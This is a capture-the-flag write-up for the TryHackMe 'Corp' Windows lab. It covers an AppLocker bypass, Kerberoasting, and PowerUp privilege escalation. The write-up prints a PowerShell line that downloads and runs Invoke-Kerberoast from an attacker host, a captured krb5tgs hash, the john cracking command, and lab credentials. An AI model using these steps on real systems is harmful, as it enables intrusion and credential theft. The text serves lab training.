Corp (THM)

TryHackMe Corp Write-Up

topics: Antivirus Evasion, Windows forensics, Kerberoasting, bypassing applocker, Windows Privilege Escalaion

  1. Plan

  2. Enumeration

  3. Bypassing Applocker

  4. Kerberoasting

  5. Administrator Privilege Escalation

new tools: Invoke-Kerberoast, Invoke-AllChecks, PowerUp.ps1

tools: nmapAutomator, powershell, cmd, iex, wget

Plan

We are tasked with exploiting the box in the following methods

Enumeration

initial nmap scan ./nmapAutomator.sh $ip Basic

We are given credentials to RDP into the machine, however it is always proper to run an nmap scan to properly visualize all means of potential entry. Perhaps there is quality active directory exploitation techniques we can practice with later.

Using credentials dark:_QuejVudId6 to RDP into machine, our access is extremely limited. We can only open explorer and files, every other icon or button is disabled to our user. In order to open cmd or powershell, we must navigate to its actual file location C:\Windows\system32\cmd.exe

Bypassing Applocker

Applocker by default contains several places that allow for executables to be run by any user. This guide is a good start. For the sake of this room, the executable path for the user dark is C:\Windows\System32\spool\drivers\color

The room suggests that the flag could be in the powershell command history, which is stored in a file like most operating systems. We can use the command Get-Content -Path 'C:\Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt' to view the contents from powershell, or simply navigate to it in files C:\Users\Dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Kerberoasting

We can use this command setspn -T medin -Q ​ */* to view users and who has an existing service principle name (SPN) and we can also view the users from C:\Users. We must be working in the executable directory C:\Windows\System32\spool\drivers\color in order to run commands

We can use a tool called Invoke-Kerberoast.ps1 to get password hashes from the vulnerable SPN account. Download from github to the attacking machine, start a python server and download from the attacker

iex​(New-Object Net.WebClient).DownloadString('https://<attackerIP>/Invoke-Kerberoast.ps1')

run the command Invoke-Kerberoast -OutputFormat hashcat ​ |fl

$krb5tgs$23$*fela$corp.local$HTTPfela*$BC1FE3E4CC81ABB946F6EB0AD7051687$1D5DC1EF47A761E0903C3F60606DD2675AD35B1EC6738C87C593F6CE477190988D4225D1ABE7616030E48380680535FE1CE3588F04ADECDBD332DD0B5108391E2161E4BBCE69AAF5708AF88DEBB7A0AB18DA31FC34EC6E1A40D25A25C21D51E82E3BBA11277774D8BCB7C54B94EC94F1E3C4106E2537122C77A4BB444C02DB0D01365C098662B6E416FB4620DC9EF83BA99B7F5A2C2F49687A19FD485115EAAA8A10E34042D93D407FB7D933A84A89068158F8450300010C118A90A89372C9BE36FA35350E434084517D2D0557C1AA30953066ACBE0E0122ADA8652540EA346F073E7D396BB45469DD8A8E7036DB806282A409EE6206F1226188E2716197594DB9E35C89414CF744B3D0AB3D30000D717936CCFA67CC3AF793FFFF15357845A6C3159B5AB35F36AE38BF4849C2FEE2E5963A8A39C9D32A1A5FF3425DCAA244FAB1D66C31D62E052095085A342337ADC6BD5CB928137C8B51A28809CC39F7BD59292B219FD05725F9352E493274448B9E91B847641775E642FF127954890FB3DC256508A9677BDDD56DA655FBB93574A0901258C45C4FC8C361A70C48CD907BCDA0381A2F64E1668CDEEF524C4CD8E77EE33650566496618404D186C7135C7041CC2C6DF3DBD2F7CD28234B2E12E3491E0E6D0604D769EECA46FB5B14B6720EF2709E2F4FDB762DC3DB9B7F36648F32C5A4E5FA21DDC970323053B037A274559B329CE46F8FE9A4A06D6E2833488D766DF1AEF8C593309F59CD8FB492F98F2B987656424DD116AC603D943AE680EA628B047F4CDD2E116BAE5CFB6F7757FF5926265712076D255CB7843C746698CA027D2F26823E7646953B4912D839741FCD82EDC0AE2AF31070994C713295C43D1D9098BEA2211E449C4E5012F51CB2743FF9603864050AE9BA5E21B09C1C7225CF8068F3351E8F26ECB4069ACAB198E97FE5CE98C18ECBA9700D6F1B40166DF254C8CFB9B02C4D19CAE2B7ECF2C30FD6A0654BE8939F83EB357B308827029A1FCC46A2DE0DE6E5171CF4E68E5574926CF550783E47ACDAC5CB67311C39C115C1B9E7AFFEDFE5BA0CED9085A882A3559506341C611EAA950443ACD64A05E2313ACE848685B981795A91EDC67FEA48DFD081D4D6B2E6909A3DF0C2762DEE766062AA39AC8AAF610BC8EE09E7D1D54E65BF3DCCD42530274F99CE37FC787DB1DA2282A12D248CF454DFA73FD54235A66132A2182E9ECD5C6A9100961E1EA57BF661E1721FD6F2DE02ECCD229C06D6DA73316A09847AAC3E0AA7C8E5D2A83CEB6EF20F057EB89C58A98C624D8DE8AD0B7637B9BCF42468F216A4204B8F112F2EEADDF1B5B498A05A2E23B55C3C1D60ADDC58C664045838CC158DAA5799518C635308267F9DB6DF842B39D294D603C5C2B7D6D951D3

The type of hash we have is displayed at the beginning krb5tgs. We can use john to crack the password, copy the hash and store it in a file.

john --format=krb5tgs --wordlist=rockyou.txt hash

Using the credentials fela:rubenF124 we can login via RDP

Administrator Privilege Escalation

Run the PowerUp.ps1 script the room suggests. Invoke-AllChecks

Login with RDP

PreviousIce (THM)Next*Set (THM)

Last updated